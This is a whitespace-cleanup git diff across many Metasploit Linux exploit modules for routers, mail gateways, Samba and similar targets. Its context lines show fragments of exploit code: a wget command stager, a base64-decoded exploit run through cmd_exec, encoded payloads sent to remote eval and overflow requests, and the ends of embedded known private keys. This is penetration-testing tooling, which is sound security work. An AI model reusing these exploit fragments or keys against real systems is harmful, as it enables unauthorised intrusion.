a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -113,5 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote res end - end diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index eb3d216918..10c29b1012 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index bed5b5fe76..ce2c32c0ab 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end - end diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index 58c6d06ce4..1f1bf2364c 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -264,5 +264,4 @@ class MetasploitModule < Msf::Exploit::Remote vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end - end diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 719a939656..cd8ed3e429 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index 473286c54e..fe94db9b1a 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -247,5 +247,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 9626c4abdc..7af10a0f1c 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Exploiting...") execute_cmdstager({:flavor => :wget}) end - end diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index ee473f6827..0445cc84d3 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -413,5 +413,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index 3536557ce6..22c9a6c019 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote jspraw end - end diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb index 24cbab9cdb..b1e21ae315 100644 --- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb @@ -275,5 +275,4 @@ class MetasploitModule < Msf::Exploit::Remote def zip_filename @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' end - end diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index 18d77277ea..cbfec50c45 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -251,5 +251,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index d80ae85c0d..0ac75af395 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -356,5 +356,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb index 3c788d53b4..c61d48859f 100644 --- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb +++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote super end end - end diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 809079bbcc..dbf3780286 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing payload...") send_request_payload(my_payload) end - end diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index bab22f8f39..decaffc7b3 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") end end - end diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 07017aea9e..58ae6185e5 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index 9802d6ff14..34d2e9625b 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index ec2d79113c..c9192c547f 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index a4488c591d..dbc341daff 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index 6fc5a46367..10d7d39a25 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Command successfully executed (according to the server).") end end - end diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 699df3e14c..f82e71f2a0 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -161,5 +161,4 @@ class MetasploitModule < Msf::Exploit::Remote xml.to_s end - end diff --git a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb index a68551e0cf..9240c6fe03 100644 --- a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb +++ b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb @@ -280,5 +280,4 @@ class MetasploitModule < Msf::Exploit::Remote @elf_sent = true send_response(cli, @pl) end - end diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 8478215a38..3782fa43a9 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -349,5 +349,4 @@ class MetasploitModule < Msf::Exploit::Remote def xml_encode(str) str.gsub(/</, '<').gsub(/>/, '>') end - end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 8da1673419..3d476cdf08 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end - end diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index 87c72539e9..87385067e1 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote return res end - end diff --git a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb index 7ed2691a14..e8a0eec85b 100644 --- a/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index a52a5a63d4..48837f17a5 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Server returned #{res.code.to_s}") end end - end diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index e849f5dcec..a494d0353a 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 3f41b288dd..1aec7aad7f 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Trying restore.php...") inject_exec(sid) end - end diff --git a/modules/exploits/linux/http/tiki_calendar_exec.rb b/modules/exploits/linux/http/tiki_calendar_exec.rb index 2f006eb839..54ebf0d1c9 100644 --- a/modules/exploits/linux/http/tiki_calendar_exec.rb +++ b/modules/exploits/linux/http/tiki_calendar_exec.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required") end end - end diff --git a/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb index b2004d7d2e..a13fc5ebd4 100644 --- a/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb +++ b/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb @@ -140,5 +140,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/linux/http/trend_micro_imsva_exec.rb b/modules/exploits/linux/http/trend_micro_imsva_exec.rb index 2b9bc1009a..de341d3de0 100644 --- a/modules/exploits/linux/http/trend_micro_imsva_exec.rb +++ b/modules/exploits/linux/http/trend_micro_imsva_exec.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 3e4d6a88d2..f7a2f1a222 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error("Sending payload failed") end end - end diff --git a/modules/exploits/linux/http/wipg1000_cmd_injection.rb b/modules/exploits/linux/http/wipg1000_cmd_injection.rb index aae9b1128d..211177eddc 100644 --- a/modules/exploits/linux/http/wipg1000_cmd_injection.rb +++ b/modules/exploits/linux/http/wipg1000_cmd_injection.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote } ) end - end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index a0acafb5cf..0bad938070 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index c10168dc4e..f3143ad3af 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -105,6 +105,5 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index 7074b39aa1..3167c471b9 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -135,5 +135,4 @@ class MetasploitModule < Msf::Exploit::Remote res end - end diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index b4a69eedc8..2db5272f3b 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 647aeba29b..5e94a5699b 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb index cb288ed06b..bf57e801e0 100644 --- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb +++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Local #{exploit_path} }.strip.split("\n").map(&:strip).join(';') end - end diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index 837342c3b8..55f9dcb714 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)") cmd_exec("#{datastore['smhstartDir']}/smhstart") end - end diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index cf11e38b7a..0bbe6f1aef 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -103,5 +103,4 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(helper_path) cmd_exec("lxsuexec #{helper_path}") end - end diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 082f20fd45..28232b8bf2 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -445,5 +445,4 @@ int main(int argc, char **argv) { output.each_line { |line| vprint_status(line.chomp) } end - end diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index fa4becdbbb..5bca0c09be 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -82,6 +82,5 @@ class MetasploitModule < Msf::Exploit::Local def setuid?(remote_file) !!(cmd_exec("test -u #{remote_file.strip} && echo true").index "true") end - end diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index 2778f37a81..545f95b452 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote "RandomIV" + iv + c.update(data) + c.final end - end diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 7865bae58d..1996a08426 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote end p.send(:my_eval, payload.encoded) end - end diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index a277f5f9c7..ea0cd5b635 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb index 3be6de75c1..d52fe1c4f2 100644 --- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb +++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote def rport datastore['RPORT'] end - end diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb index a46882dc28..0eda3c19fc 100644 --- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb +++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb @@ -103,5 +103,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end end - end diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb index c138f55443..6eb489cebd 100644 --- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb +++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb @@ -221,5 +221,4 @@ class MetasploitModule < Msf::Exploit::Remote nil end - end diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index 8bda606175..5b7da3bdf4 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -107,6 +107,5 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(packet) disconnect end - end diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index 593308af09..c19287ef49 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(msg) end - end diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index 5a82d4a7d3..313b77c1d1 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index 2fbe767d0e..179146aaeb 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 5cb30b1127..10a962aa71 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 00c5b6671b..c6403c1839 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 3ed162368f..2b788a66d1 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -265,5 +265,4 @@ class MetasploitModule < Msf::Exploit::Remote data end - end diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index 7f04fb7ce6..584abe14cf 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -162,7 +162,6 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index 3e1ad29c11..04b05b52c2 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Exploit::Remote @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl super end - end diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 55853a891f..24c948d9fc 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Remote sock.get_once(-1, 10) disconnect end - end diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index cb26ce95f0..c6355b4b65 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Exploit::Remote Rex.sleep(1) end - end diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 79ada49ae8..a9de3f8f6e 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index a8bb0dcbf3..baa230d45b 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Exploit::Remote tre = len & 0xff [uno,dos,tre].pack('C*') end - end diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index 9234bdcbd8..af4769dd65 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index 92773bce59..8a4173d25d 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index da74b784c4..0e658e1073 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 8323da77e3..2eb5ff30a4 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -127,5 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote "\r\n" sock.put(req) end - end diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index 680dd16f14..eebe034289 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Exploit::Remote break if session_created? } end - end diff --git a/modules/exploits/linux/samba/is_known_pipename.rb b/modules/exploits/linux/samba/is_known_pipename.rb index a490b277a9..f1d93ce4a3 100644 --- a/modules/exploits/linux/samba/is_known_pipename.rb +++ b/modules/exploits/linux/samba/is_known_pipename.rb @@ -468,5 +468,4 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Samba version #{samba_version.to_s} found with writeable share '#{@share}'") return CheckCode::Appears end - end diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 9e73d3e836..3431c66258 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -341,5 +341,4 @@ class MetasploitModule < Msf::Exploit::Remote dcerpc.last_response.stub_data[0,20] end - end diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index 5c159a9b31..534c3f7b40 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -384,6 +384,5 @@ class MetasploitModule < Msf::Exploit::Remote dcerpc.socket.write(data) data.length end - end diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 2d9a7cd69e..88978de114 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 9b512bfb34..8c82d3044f 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Exploit::Remote register_file_for_cleanup("/tmp/#{filename}") end - end diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index c9e1433f95..f4728464cb 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -190,5 +190,4 @@ x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== -----END RSA PRIVATE KEY----- EOF end - end diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 34284c4dfb..b4d011e27d 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -136,7 +136,6 @@ SzmJVCWFyVuuANR2Bnc= -----END DSA PRIVATE KEY----- EOF end - end diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index d7fdcde644..7f10296cb5 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git 